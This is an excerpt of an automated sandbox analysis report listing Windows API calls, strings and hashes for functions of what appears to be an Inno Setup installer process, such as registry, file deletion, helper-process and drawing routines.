                                                                                  • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE9A
                                                                                  • FreeSid.ADVAPI32(00000000,0042E00F,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E002
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressAllocateFreeHandleInitializeModuleProcVersion
                                                                                  • String ID: CheckTokenMembership$advapi32.dll
                                                                                  • API String ID: 1717332306-1888249752
                                                                                  • Opcode ID: 4a30196eef26d606adadde61f7f75770c19aed3d8c9eecd837d7be02f10dab76
                                                                                  • Instruction ID: 43c95a2de9d728c66786e8532ced7735e89316b541e9a7ac012d7ecbef6b034a
                                                                                  • Opcode Fuzzy Hash: 4a30196eef26d606adadde61f7f75770c19aed3d8c9eecd837d7be02f10dab76
                                                                                  • Instruction Fuzzy Hash: 8451E231B00625AEDB10EAAADD46FBF77ACDB08308F510437B901E71C2C9789901976D
                                                                                  APIs
                                                                                  • ShowWindow.USER32(?,00000005,00000000,0048BBBF,?,?,00000000,?,00000000,00000000,?,0048BEE1,00000000,0048BEEB,?,00000000), ref: 0048B8BF
                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,0048BBBF,?,?,00000000,?,00000000,00000000,?,0048BEE1,00000000), ref: 0048B8D2
                                                                                  • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,0048BBBF,?,?,00000000,?,00000000,00000000), ref: 0048B8E2
                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0048B903
                                                                                  • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,0048BBBF,?,?,00000000,?,00000000), ref: 0048B913
                                                                                    • Part of subcall function 0042D29C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D327,?,?,00000000,?,?,0048B304,00000000,0048B497,?,?,00000005), ref: 0042D2D1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                                  • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                                  • API String ID: 2000705611-3672972446
                                                                                  • Opcode ID: 3f59d8a25f49f759cbe2bfc2fabe5b98fcc7f65fb6331299d61a55d52f3d4fc8
                                                                                  • Instruction ID: 5ca90d982b317c110493bbf291cef407a43f8b79c14703a6252be031079f74b3
                                                                                  • Opcode Fuzzy Hash: 3f59d8a25f49f759cbe2bfc2fabe5b98fcc7f65fb6331299d61a55d52f3d4fc8
                                                                                  • Instruction Fuzzy Hash: BB81D430A046449FDB15FBA5D852BAE77A4EF49304F518867F800AB792D77CAC05CBAC
                                                                                  APIs
                                                                                  • 73A24C40.GDI32(00000000,?,00000000,?), ref: 0041B33B
                                                                                  • 73A24C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B345
                                                                                  • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B357
                                                                                  • 73A26180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B36E
                                                                                  • 73A1A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B37A
                                                                                  • 73A24C00.GDI32(00000000,0000000B,?,00000000,0041B3D3,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B3A7
                                                                                  • 73A1A480.USER32(00000000,00000000,0041B3DA,00000000,0041B3D3,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B3CD
                                                                                  • SelectObject.GDI32(00000000,?), ref: 0041B3E8
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0041B3F7
                                                                                  • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B423
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0041B431
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0041B43F
                                                                                  • DeleteDC.GDI32(00000000), ref: 0041B448
                                                                                  • DeleteDC.GDI32(?), ref: 0041B451
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Object$Select$Delete$A26180A480A570Stretch
                                                                                  • String ID:
                                                                                  • API String ID: 359944910-0
                                                                                  • Opcode ID: 2c4d4475d38b5b68e985c100817c53aafe9ee17c4f514cc1513c2ca3fca90b25
                                                                                  • Instruction ID: 9e4c321c5c93b0e1e343692bea12ab8770fc61bb2e035fd3389159a1f0c1b2be
                                                                                  • Opcode Fuzzy Hash: 2c4d4475d38b5b68e985c100817c53aafe9ee17c4f514cc1513c2ca3fca90b25
                                                                                  • Instruction Fuzzy Hash: AF41DF71E40609AFDB10DAE9D846FEFB7B8EB08704F104466B614F7281C7B8AD408BA4
                                                                                  APIs
                                                                                    • Part of subcall function 0042DBBC: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004787FF,?,00000001,?,?,004787FF,?,00000001,00000000), ref: 0042DBD8
                                                                                  • RegQueryValueExA.ADVAPI32(004577FA,00000000,00000000,?,00000000,?,00000000,004528C1,?,004577FA,00000003,00000000,00000000,004528F8), ref: 00452741
                                                                                    • Part of subcall function 0042E5D8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004511C7,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E5F7
                                                                                  • RegQueryValueExA.ADVAPI32(004577FA,00000000,00000000,00000000,?,00000004,00000000,0045280B,?,004577FA,00000000,00000000,?,00000000,?,00000000), ref: 004527C5
                                                                                  • RegQueryValueExA.ADVAPI32(004577FA,00000000,00000000,00000000,?,00000004,00000000,0045280B,?,004577FA,00000000,00000000,?,00000000,?,00000000), ref: 004527F4
                                                                                  Strings
                                                                                  • , xrefs: 004526B2
                                                                                  • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045265F
                                                                                  • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00452698
                                                                                  • RegOpenKeyEx, xrefs: 004526C4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: QueryValue$FormatMessageOpen
                                                                                  • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                  • API String ID: 2812809588-1577016196
                                                                                  • Opcode ID: 05155638212ed529a2ba0009c6f3f8d46fcd04d5f2e16dddff17fa310d474460
                                                                                  • Instruction ID: 55c965dbc026458929bc87e2227eb058ac376dc85cdae7d49d5ae97b397b99b9
                                                                                  • Opcode Fuzzy Hash: 05155638212ed529a2ba0009c6f3f8d46fcd04d5f2e16dddff17fa310d474460
                                                                                  • Instruction Fuzzy Hash: 63912371E04208AFDB01EBD5C941BDEB7B8EB49305F50456BF900F7282D779AE098B69
                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00455429
                                                                                  • GetLastError.KERNEL32(?,000000FF), ref: 00455441
                                                                                  • UnmapViewOfFile.KERNEL32(00000000,0045553C), ref: 00455517
                                                                                  • CloseHandle.KERNEL32(00000000,0045553C), ref: 00455526
                                                                                  • CloseHandle.KERNEL32(?,0045553C), ref: 0045552F
                                                                                  Strings
                                                                                  • REGDLL mutex wait failed (%d, %d), xrefs: 00455458
                                                                                  • GetProcAddress, xrefs: 004554A2
                                                                                  • OleInitialize, xrefs: 0045547E
                                                                                  • LoadLibrary, xrefs: 00455490
                                                                                  • REGDLL returned unknown result code %d, xrefs: 004554F6
                                                                                  • REGDLL failed with exit code 0x%x, xrefs: 00455419
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle$ErrorFileLastObjectSingleUnmapViewWait
                                                                                  • String ID: GetProcAddress$LoadLibrary$OleInitialize$REGDLL failed with exit code 0x%x$REGDLL mutex wait failed (%d, %d)$REGDLL returned unknown result code %d
                                                                                  • API String ID: 1601104323-4271354415
                                                                                  • Opcode ID: a3eaaebebf56f69715b317256c81fbda2eb8aefd4e8e046341ebc453bc4d2d41
                                                                                  • Instruction ID: ecca4b94830fd0dc61d07626ffd6de48b9a7a426eec48b631a8745367e6375e7
                                                                                  • Opcode Fuzzy Hash: a3eaaebebf56f69715b317256c81fbda2eb8aefd4e8e046341ebc453bc4d2d41
                                                                                  • Instruction Fuzzy Hash: AC3184309045498BCB10DBA9C4557AEB7F1AF08316F6481AAEC04A7363D7389D48CF29
                                                                                  APIs
                                                                                  • CloseHandle.KERNEL32(?), ref: 00455E8B
                                                                                  • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00455EA7
                                                                                  • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00455EB5
                                                                                  • GetExitCodeProcess.KERNEL32(?), ref: 00455EC6
                                                                                  • CloseHandle.KERNEL32(?,?,00002710,?,00000001,?,00002710,?), ref: 00455F0D
                                                                                  • Sleep.KERNEL32(000000FA,?,?,00002710,?,00000001,?,00002710,?), ref: 00455F29
                                                                                  Strings
                                                                                  • Helper process exited, but failed to get exit code., xrefs: 00455EFF
                                                                                  • Helper process exited., xrefs: 00455ED5
                                                                                  • Stopping 64-bit helper process. (PID: %u), xrefs: 00455E7D
                                                                                  • Helper process exited with failure code: 0x%x, xrefs: 00455EF3
                                                                                  • Helper isn't responding; killing it., xrefs: 00455E97
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                  • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                  • API String ID: 3355656108-1243109208
                                                                                  • Opcode ID: 6aac938fd09aa13cb5101859853c0bac77963321aa13af3fa76e3c1173d47f8c
                                                                                  • Instruction ID: 4398f78d86117d38c3456024417cc82a0fe7f956a59eb3b117ed3afd0f0a108a
                                                                                  • Opcode Fuzzy Hash: 6aac938fd09aa13cb5101859853c0bac77963321aa13af3fa76e3c1173d47f8c
                                                                                  • Instruction Fuzzy Hash: AB216071604B009BC720E779C45676B76D89F48315F04882EB99ACB693D778E8489B2A
                                                                                  APIs
                                                                                    • Part of subcall function 0042DB84: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DBB0
                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004524B3,?,00000000,00452577), ref: 00452403
                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004524B3,?,00000000,00452577), ref: 0045253F
                                                                                    • Part of subcall function 0042E5D8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004511C7,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E5F7
                                                                                  Strings
                                                                                  • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045231B
                                                                                  • , xrefs: 00452365
                                                                                  • RegCreateKeyEx, xrefs: 00452377
                                                                                  • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045234B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreateFormatMessageQueryValue
                                                                                  • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                  • API String ID: 2481121983-1280779767
                                                                                  • Opcode ID: 288846deb02bbc5f795159fc3c3eba224fb24e687c9750ba91269602c04e10ff
                                                                                  • Instruction ID: de5cde5d4794d871db65923d6d7ec33c83b9e0c7cf79efa68b0c0e3d55848f08
                                                                                  • Opcode Fuzzy Hash: 288846deb02bbc5f795159fc3c3eba224fb24e687c9750ba91269602c04e10ff
                                                                                  • Instruction Fuzzy Hash: 72810075900209AFDB01DFD5C981BEEB7B9EB49315F50442BF900F7281D778AA05CB69
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(00000000,00457653,?,?,?,?), ref: 00457505
                                                                                    • Part of subcall function 004508D4: DeleteFileA.KERNEL32(00000000,00000000,00450931,?,-00000001,?), ref: 0045090B
                                                                                    • Part of subcall function 004508D4: GetLastError.KERNEL32(00000000,00000000,00450931,?,-00000001,?), ref: 00450913
                                                                                    • Part of subcall function 00454E8C: GetLocalTime.KERNEL32(0048BF15,00000000,00455013,?,?,00000000,0048E628,?,004725CC,00000000,004726E7,?,?,00000000,0048E628,00000000), ref: 00454EBC
                                                                                  Strings
                                                                                  • Stripped read-only attribute., xrefs: 004574DE
                                                                                  • .FTS, xrefs: 00457471
                                                                                  • Failed to strip read-only attribute., xrefs: 004574EA
                                                                                  • Failed to delete the file; it may be in use (%d)., xrefs: 004575F4
                                                                                  • .HLP, xrefs: 00457447
                                                                                  • .GID, xrefs: 00457458
                                                                                  • The file appears to be in use (%d). Will delete on restart., xrefs: 0045754E
                                                                                  • Deleting file: %s, xrefs: 004574A4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$DeleteFileLocalTime
                                                                                  • String ID: .FTS$.GID$.HLP$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                                  • API String ID: 2533072589-88052198
                                                                                  • Opcode ID: e0ec5e1697d8ab5af27e05c2fe5e50305802ae3889abf25a18bde55b7ea7ff45
                                                                                  • Instruction ID: 811b463950c400bc34d0cbc61a74bc98fe9a3fd360600016b7b8fa072f389a0c
                                                                                  • Opcode Fuzzy Hash: e0ec5e1697d8ab5af27e05c2fe5e50305802ae3889abf25a18bde55b7ea7ff45
                                                                                  • Instruction Fuzzy Hash: 6A51C2307086445BDB01EB6D98516AE7BA4AF49319F5084BBFC00A7383DB7C9E0DCB99
                                                                                  APIs
                                                                                    • Part of subcall function 004517B4: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,0048A541,_iu,?,00000000,004518EE), ref: 004518A3
                                                                                    • Part of subcall function 004517B4: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,0048A541,_iu,?,00000000,004518EE), ref: 004518B3
                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0048A3ED
                                                                                  • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,0048A541), ref: 0048A40E
                                                                                  • CreateWindowExA.USER32(00000000,STATIC,0048A550,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0048A435
                                                                                  • SetWindowLongA.USER32(?,000000FC,00489DC4), ref: 0048A448
                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,0048A514,?,?,000000FC,00489DC4,00000000,STATIC,0048A550), ref: 0048A478
                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 0048A4EC
                                                                                  • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,0048A514,?,?,000000FC,00489DC4,00000000), ref: 0048A4F8
                                                                                    • Part of subcall function 00451B04: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00451BEB
                                                                                  • 73A25CF0.USER32(?,0048A51B,00000000,00000000,00000000,00000000,00000000,00000097,00000000,0048A514,?,?,000000FC,00489DC4,00000000,STATIC), ref: 0048A50E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                  • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                  • API String ID: 170458502-2312673372
                                                                                  • Opcode ID: ea1c64b27999af857b5beaefa9345ea7c5a013119fc6669137c8570046018214
                                                                                  • Instruction ID: b2cee1b800cc89d3f357c4e073f762d35efadd665948c1863781686c09c37af0
                                                                                  • Opcode Fuzzy Hash: ea1c64b27999af857b5beaefa9345ea7c5a013119fc6669137c8570046018214
                                                                                  • Instruction Fuzzy Hash: 85413470A00204AEDB00FBA5DC42FAE77B8EB08704F50496BF500F7292D6B99E108B69
                                                                                  APIs
                                                                                  • GetActiveWindow.USER32 ref: 0042E8B0
                                                                                  • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042E8C4
                                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042E8D1
                                                                                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042E8DE
                                                                                  • GetWindowRect.USER32(?,00000000), ref: 0042E92A
                                                                                  • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042E968
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                  • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                  • API String ID: 2610873146-3407710046
                                                                                  • Opcode ID: e752c7feb628c1a6d9437a45393d2bd6cf35c654e91c11ac56cfbbe8807f9034
                                                                                  • Instruction ID: 33ac28da14370253861b36f95f087b627e1e6904e9041f7152ab5bdf29b36732
                                                                                  • Opcode Fuzzy Hash: e752c7feb628c1a6d9437a45393d2bd6cf35c654e91c11ac56cfbbe8807f9034
                                                                                  • Instruction Fuzzy Hash: 2821C5B27006145BD310EA669C41F3F3799DB84710F48052FF944AB386D678EC408B59
                                                                                  APIs
                                                                                  • SendMessageA.USER32(00000000,00000129,00000000,00000000), ref: 0044C5D8
                                                                                  • LineDDA.GDI32(?,?,?,?,Function_0004BE6C,?), ref: 0044C729
                                                                                  • LineDDA.GDI32(?,?,?,?,Function_0004BE6C,?), ref: 0044C74D
                                                                                  • DrawFrameControl.USER32(00000000,?,00000004,00000000), ref: 0044C85C
                                                                                    • Part of subcall function 0041ABD8: FillRect.USER32(?,?,00000000), ref: 0041AC00
                                                                                  • GetTextColor.GDI32(00000000), ref: 0044C957
                                                                                  • GetSysColor.USER32(00000011), ref: 0044C979
                                                                                  • SetTextColor.GDI32(00000000,00000000), ref: 0044C987
                                                                                  • SetTextColor.GDI32(00000000,00000000), ref: 0044C9B1
                                                                                  • OffsetRect.USER32(00000000,00000000,?), ref: 0044CA52
                                                                                  • InflateRect.USER32(?,00000001,00000001), ref: 0044CB22
                                                                                  • SetTextColor.GDI32(00000000,?), ref: 0044CB3D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$Text$Rect$Line$ControlDrawFillFrameInflateMessageOffsetSend
                                                                                  • String ID:
                                                                                  • API String ID: 3787931423-0
                                                                                  • Opcode ID: 29c99c19b13906842c1a1a4fd42029460e534897e35d4e06f1cb4a0fcd515bc7
                                                                                  • Instruction ID: 118d866ff7c2ad117627c5bd1854f1bb66141afa76996ea823d7f11faef5f867
                                                                                  • Opcode Fuzzy Hash: 29c99c19b13906842c1a1a4fd42029460e534897e35d4e06f1cb4a0fcd515bc7
                                                                                  • Instruction Fuzzy Hash: FC124F74A01148EFEB51DBA8C9C5BEEBBF5AF08304F1840A5E544E7352D738AE41DB58
                                                                                  APIs
                                                                                  • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046AB86
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: ChangeNotify
                                                                                  • String ID: .lnk$.pif$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                                  • API String ID: 3893256919-3966328851
                                                                                  • Opcode ID: e37e366fa0f4d920c88c3fa6d6c603f5c5a53a075df8843f0109f02ab80ade70
                                                                                  • Instruction ID: 149d7ae7c1f59d5980ee9bbe6f5554c8bc9e80bd895a8ccada0f2f84bb51d7a6
                                                                                  • Opcode Fuzzy Hash: e37e366fa0f4d920c88c3fa6d6c603f5c5a53a075df8843f0109f02ab80ade70
                                                                                  • Instruction Fuzzy Hash: CBA12174A005099FDB00EF95D982BEEBBF5AF08304F148166F910B7391D778AE45CB6A
                                                                                  APIs
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0045620B,?,00000000,0045626E,?,?,?,?), ref: 00456089
                                                                                  • TransactNamedPipe.KERNEL32(?,?,0000000C,?,00000014,?,?,00000000,004561A0,?,00000000,00000001,00000000,00000000,00000000,0045620B), ref: 004560E6
                                                                                  • GetLastError.KERNEL32(?,?,0000000C,?,00000014,?,?,00000000,004561A0,?,00000000,00000001,00000000,00000000,00000000,0045620B), ref: 004560F3
                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0045613F
                                                                                  • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00456179,?,?,0000000C,?,00000014,?,?,00000000,004561A0,?,00000000), ref: 00456165
                                                                                  • GetLastError.KERNEL32(?,?,00000000,00000001,00456179,?,?,0000000C,?,00000014,?,?,00000000,004561A0,?,00000000), ref: 0045616C
                                                                                    • Part of subcall function 004513F0: GetLastError.KERNEL32(00000000,00451E05,00000005,00000000,00451E3A,?,?,00000000,0048E628,00000004,00000000,00000000,00000000,?,0048B811,00000000), ref: 004513F3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                  • String ID: CreateEvent$TransactNamedPipe
                                                                                  • API String ID: 2182916169-3012584893
